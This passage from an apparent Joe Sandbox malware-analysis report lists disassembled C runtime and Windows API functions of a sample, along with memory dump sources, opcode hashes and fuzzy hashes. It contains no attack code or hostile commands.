                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0D159B9E00258AFCF15CFA8D880AEEBBB5FF19304F58412AE856E7351D730A945CB51
                                                                                                                                                                                                                            Function 001D01BB Relevance: 6.3, APIs: 4, Instructions: 325COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 2b25e849923064d9b5a55e65d4fb1bd14e0dfe3207bfc449d4cf15b6a91fd711
                                                                                                                                                                                                                            • Instruction ID: 0a9893d22eeed9fee8359b0510356b52047857ecb3609debaba39f1522766720
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b25e849923064d9b5a55e65d4fb1bd14e0dfe3207bfc449d4cf15b6a91fd711
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD1C37191012DABDB20EB94DC52BD9B778AF28304F1554E7A908B3151DB70BF85CF61
                                                                                                                                                                                                                            Function 0019CBAB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            • Opcode ID: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction ID: 44baabdd045da25a0340e7adba98b2fef7e7bf6ed12b15654a89f0bf7ffd086d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511572604606AFEF298F54D841BBA7BA4FF14310F28412DE88A87691E731FC80DBD0
                                                                                                                                                                                                                            Function 001DA313 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 2a3a95c2239512ea1048ea6c83c2bce4995b7bd70dd19da3d1f381d2d0d0e092
                                                                                                                                                                                                                            • Instruction ID: a07074f8875059847867b17132af561eee1ecb0bba84f82a157b7d09d6a73ad2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3a95c2239512ea1048ea6c83c2bce4995b7bd70dd19da3d1f381d2d0d0e092
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F151D8B1E4026A9BDB15EF24DC92ADDB37CAF24704F4101E6E618B3152DB70AF868F54
                                                                                                                                                                                                                            Function 001D855F Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 4606f376861381f818f80eaab977bb148334af8bbf25d557b91848da5220f5e8
                                                                                                                                                                                                                            • Instruction ID: ffb9c960c553f71858f2b7639d68dae5a77f9aaeb44c20d61dd9f4f8584d05e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4606f376861381f818f80eaab977bb148334af8bbf25d557b91848da5220f5e8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441B172D4021CABDB24EBA0EC47FDDB37CAB18704F644496B614E3191DBB4AB488F55
                                                                                                                                                                                                                            Function 001AD0BB Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AD11F
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD126
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001AD160
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD167
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                            • Opcode ID: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction ID: 415a286567e3b855de8e1ef82d3ef39f628f2fa056607303e51bd92e3ec4b9c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521D7B9600A05AFDB20AF65EC8196BB7A9FF173747018918F86BD7950DB30EC40CB90
                                                                                                                                                                                                                            Function 001A32F6 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction ID: 2b10e350dcfd252cc88c4a7467e48b625b34aa125e4615c957ac3890210c1471
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B921AC79608605AFDF24AF65DC81A6AB7A9FF223647108528F876D7240DF30EE0097A0
                                                                                                                                                                                                                            Function 001AE06A Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001AE072
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0AA
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0CA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                            • Opcode ID: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction ID: c4f3bcc0fefb6dffa883ba478fc9aebd40430063a3a59b4c8a091f543f8b3440
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F211C4B9605126BF662127B66C8DCAF6DACEFA73A87140124F40192101FF749E0046F1
                                                                                                                                                                                                                            Function 001E8A65 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E8A71
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 001E8A91
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001E8AA1
                                                                                                                                                                                                                            • _free.LIBCMT ref: 001E8AD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3170801528-0
                                                                                                                                                                                                                            • Opcode ID: ede986ab11c6e57392b10305871a61c507c4d0a5f4112cf5c4421020098d088a
                                                                                                                                                                                                                            • Instruction ID: 64a0549b9b88fdc6fb32285bfe2a30a5deca771f4ba45a413b5246cb82dd1b81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ede986ab11c6e57392b10305871a61c507c4d0a5f4112cf5c4421020098d088a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501C071D01B51ABCB25AF26A40676DB760BF44720F09013BF508A32E1CF34AD42CBD5
                                                                                                                                                                                                                            Function 001B3966 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000), ref: 001B397D
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550,74DEF550,?,001AA734,00000000), ref: 001B3989
                                                                                                                                                                                                                              • Part of subcall function 001B394F: CloseHandle.KERNEL32(FFFFFFFE,001B3999,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550,74DEF550), ref: 001B395F
                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 001B3999
                                                                                                                                                                                                                              • Part of subcall function 001B3911: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B3940,001B2864,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550), ref: 001B3924
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550), ref: 001B39AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                            • Opcode ID: 5a279adddf80d2851e3f7da6f9dc8d54a493b09e375002b7206ca1ecfd42163a
                                                                                                                                                                                                                            • Instruction ID: 4a82ce3324146a4e7eee392a4b2af1dafbdb7f42e6ee5c91e6cb204837018ce7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a279adddf80d2851e3f7da6f9dc8d54a493b09e375002b7206ca1ecfd42163a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01C36000124BBCF222FD5DC09AC93F26FB593A1B044510FA2995531DB728960DB90
                                                                                                                                                                                                                            Function 0019D1A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0019D1CC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                            • Opcode ID: 663f53f17dc5cb0b2082af460c00c0fc03cbce5cab81f9aa99cad33642d165ad
                                                                                                                                                                                                                            • Instruction ID: 07f8a9737d57a851f37ecd7612552f8a851203cf77b093fd3e260f43affc3ca8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 663f53f17dc5cb0b2082af460c00c0fc03cbce5cab81f9aa99cad33642d165ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3416772900209AFDF16DFA8DC81AEEBBB5FF48304F188199F905A7261D335D960DB91
                                                                                                                                                                                                                            Function 00196AB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00196B3D
                                                                                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?), ref: 00196B62
                                                                                                                                                                                                                              • Part of subcall function 0019AD9B: RaiseException.KERNEL32(E06D7363,00000001,00000003,00191365,?,?,?,?,00191365,?,001C0B30), ref: 0019ADFB
                                                                                                                                                                                                                              • Part of subcall function 0019DD93: IsProcessorFeaturePresent.KERNEL32(00000017,0019F12B,?,?,?,?,00000000,001A08D9,?,?,?), ref: 0019DDAF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                            • Opcode ID: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction ID: b38639acfb360cb389c408dd6f724249d5c1afab3c51b8014ee1a60b1359d178
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321AF32E00218EBCF24DFE5D945AAEB7B9FF14710F59041DE40AAB650D734AD45CBA1
                                                                                                                                                                                                                            Function 00191C1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InitOnceBeginInitialize.KERNEL32(00224E80,00000000,?,00000000), ref: 00191C30
                                                                                                                                                                                                                            • InitOnceComplete.KERNEL32(00224E80,00000000,00000000), ref: 00191C47
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
